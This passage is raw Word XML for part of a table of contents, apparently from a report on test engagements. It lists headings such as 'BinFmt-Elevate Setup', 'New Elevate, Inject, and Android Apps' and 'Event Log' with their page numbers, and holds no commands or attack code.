              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600061" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>7.5.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061 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>71</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="64E07820" w14:textId="4100023E" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="960"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600062" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>7.6</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>20:32 -- TA1 THEIA 3 -- Benign Activity (BinFmt-Elevate Setup)</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600062 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>71</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="126D616F" w14:textId="697C80B1" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1200"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600063" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>7.6.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063 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>71</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="093F91D4" w14:textId="26ED165A" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1200"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600064" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>7.6.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064 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>71</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="66CA35D3" w14:textId="0E0CD5ED" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1200"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600065" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>7.6.3</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Benign Activity Setup</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600065 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>71</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="767FC840" w14:textId="5355401D" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="480"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:i w:val="0"/>
              <w:iCs w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600066" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>05/15/2019 – New Elevate, Inject, and Android Apps</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600066 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>73</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1F322EF8" w14:textId="552F3723" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="960"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600067" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>8.1</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Schedule</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600067 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>73</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6340B356" w14:textId="7F253BD2" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="960"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600068" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsia="Courier New" w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>8.2</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Setup</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600068 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>73</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="442CE2E0" w14:textId="2B5DE1BC" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="960"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600069" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>8.3</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>10:22 -- TA1 ClearScope 1 -- Benign Activity (Screencap APK, Failed)</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600069 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>73</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="09089627" w14:textId="0CDD88EB" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1200"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600070" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>8.3.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070 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>74</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2975036D" w14:textId="51D8F396" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1200"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600071" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>8.3.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071 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>74</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="09113B5A" w14:textId="6DA89B28" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1200"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600072" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>8.3.3</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Benign Activity Setup</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600072 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>74</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="751E9B7F" w14:textId="2A8E5827" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1200"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600073" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsia="Courier New" w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>8.3.4</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Event Log</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600073 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>74</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="324052FF" w14:textId="3063246A" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="960"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600074" w:history="1">
